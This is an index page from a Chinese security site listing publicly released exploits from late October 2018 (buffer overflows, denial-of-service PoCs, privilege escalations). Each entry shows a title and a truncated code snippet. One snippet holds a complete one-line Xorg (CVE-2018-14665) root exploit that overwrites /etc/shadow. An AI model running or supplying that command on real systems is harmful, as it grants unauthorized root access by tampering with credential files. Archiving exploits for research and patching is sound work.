首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)
  日期:2018-11-01 14:52:02 点击:126 评论:0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT i
xorg-x11-server 1.20.3 - Privilege Escalation
  日期:2018-11-01 14:50:56 点击:41 评论:0
# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation # Date: 2018-10-27 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.x.org/ # Version: xorg-x11-server 1.19.0 - 1.20.2 # Tested on: OpenBSD 6.3 and 6.4 # CVE : CVE-2018-14665
R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)
  日期:2018-11-01 14:49:43 点击:219 评论:0
#!/usr/bin/python ############################################### # R 3.4.4 Win10 x86 Buffer Overflow # # discovered by: bzyo # # author: Charles Truscott # # I love you Alison Thompson OAM # # tested on: Windows 10 x86 # # rebooted for practice defe
Microsoft Windows 10 User Sessions Stuck
  日期:2018-11-01 14:48:46 点击:33 评论:0
#!/usr/bin/env python## Exploit Title: Windows 10 All Users Session Stuck# Date: 2018-10-24# Exploit Author: Fabien DROMAS - Security consultant @ Synetis fabien.dromas[at]synetis[dot]com# Twitter: st0rnpentest# # After microsoft's refusal to consid
Modbus Slave 7.0.0 - Denial of Service (PoC)
  日期:2018-10-30 14:00:36 点击:132 评论:0
# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC) # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.modbustools.com/ # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.ex
Paramiko 2.4.1 - Authentication Bypass
  日期:2018-10-30 13:59:47 点击:112 评论:0
# Exploit Title: Paramiko 2.4.1 - Authentication Bypass # Date: 2018-10-27 # Exploit Author: Adam Brown # Vendor Homepage: https://www.paramiko.org # Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2 # Version: 1.17.6, 1.18.x 1.18.5, 2
Local Server 1.0.9 - Denial of Service (PoC)
  日期:2018-10-30 13:59:02 点击:21 评论:0
# Exploit Title: Local Server 1.0.9 - Denial of Service (PoC) # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.ujang-rohidin.blogspot.com/ # Software Link: https://sourceforge.net/projects/local-server/files
Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
  日期:2018-10-30 13:58:19 点击:37 评论:0
# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC) # Author: Kaan apar # Discovery Date: 2018-10-27 # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe # Vendor Homepage : https://www.modbustools.com # Test
AlienIP 2.41 - Denial of Service (PoC)
  日期:2018-10-30 13:57:33 点击:27 评论:0
# Exploit Title: AlienIP 2.41 - Denial of Service (PoC) # Author: Arturo de la Cruz Tellez # Discovery Date: 2018-10-17 # Vendor Homepage: http://www.armcode.com # Tested Version: 2.41 # Tested on OS: Microsoft Windows 10 Home Single Language x64 # V
Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
  日期:2018-10-30 13:56:30 点击:27 评论:0
# Exploit Title: Navicat 12.0.29 - 'SSH' Denial of Service (PoC) # Author: Rafael Alfaro # Discovery Date: 2018-10-27 # Vendor Homepage: https://www.navicat.com/es/ # Software Link : https://www.navicat.com/es/download/navicat-premium # Vulnerability
Linux mremap() TLB Flush Too Late
  日期:2018-10-30 13:55:11 点击:86 评论:0
Linux: mremap() TLB flush too late with concurrent ftruncate() CVE-2018-18281Tested on the master branch (4.19.0-rc7+).sys_mremap() takes current-mm-mmap_sem for writing, then callsmremap_to()-move_vma()-move_page_tables(). move_page_tables() firstc
WordPress Arforms 3.5.1 Arbitrary File Delete
  日期:2018-10-29 14:16:25 点击:53 评论:0
# Exploit Title: WordPress Plugin Arforms 3.5.1 - Delete arbitrary file# Google Dork: /plugins/arforms/# Date: 2018-10-17# Exploit Author: Amir Hossein Mahboubi# Twitter: @Mahboubi66# Vendor Homepage: https://www.arformsplugin.com/# Version: =3.5.1#
ASRock Drivers Privilege Escalation / Code Execution
  日期:2018-10-29 14:15:32 点击:27 评论:0
SecureAuth - SecureAuth Labs Advisoryhttp://www.secureauth.com/ASRock Drivers Elevation of Privilege Vulnerabilities1. *Advisory Information*Title: ASRock Drivers Elevation of Privilege VulnerabilitiesAdvisory ID: CORE-2018-0005Advisory URL: https:/
Linux systemd Symlink Dereference Via chown_one()
  日期:2018-10-29 14:14:40 点击:38 评论:0
systemd: chown_one() can dereference symlinks CVE-2018-15687[I am sending this bug report to Ubuntu, even though it's an upstreambug, as requested ata href=https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-re
Linux systemd Line Splitting
  日期:2018-10-29 14:13:49 点击:56 评论:0
systemd: reexec state injection: fgets() on overlong lines leads to line splitting CVE-2018-15686[I am sending this bug report to Ubuntu, even though it's an upstreambug, as requested ata href=https://github.com/systemd/systemd/blob/master/docs/CONT
xorg-x11-server Local Root
  日期:2018-10-29 14:12:08 点击:38 评论:0
#!/bin/bash# x0rg - Xorg Local Root Exploit# Released under the Snitches Get Stitches Public Licence.# props to prdelka / fantastic for the shadow vector. # Gr33tz to everyone in #lizardhq and elsewhere 3# ~infodox (25/10/2018)# FREE LAURI LOVE!echo
xorg-x11-server Local Privilege Escalation
  日期:2018-10-29 14:11:17 点击:37 评论:0
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp root::16431:0:99999:7::: -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. #!/bi
libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer
  日期:2018-10-26 13:59:38 点击:36 评论:0
/* libtiff up to and including 4.0.9 decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size. The issue occurs because JBIGDecode entirely ignores the size of the buffer that is passed to it: static int JBIGDecode(TIFF* tif, uint8* buf
Adult Filter 1.0 - Buffer Overflow (SEH)
  日期:2018-10-26 13:58:34 点击:58 评论:0
# Exploit Title: Adult Filter 1.0 - Buffer Overflow (SEH) # Exploit Author: zkan Mustafa Akku (AkkuS) # Discovery Date: 2018-10-25 # Homepage: http://www.armcode.com/adult-filter/ # Software Link: http://www.armcode.com/downloads/adult-filter.exe # V
BORGChat 1.0.0 build 438 - Denial of Service (PoC)
  日期:2018-10-26 13:57:44 点击:25 评论:0
# Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service (PoC) # Dork: N/A # Date: 2018-10-22 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://borgchat.10n.ro # Software Link: http://borgchat.10n.ro/download.php # Version: 1.0.0 build 43
共637页/12733条记录 首页 上一页 [8] [9] [10] 11 [12] [13] [14] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved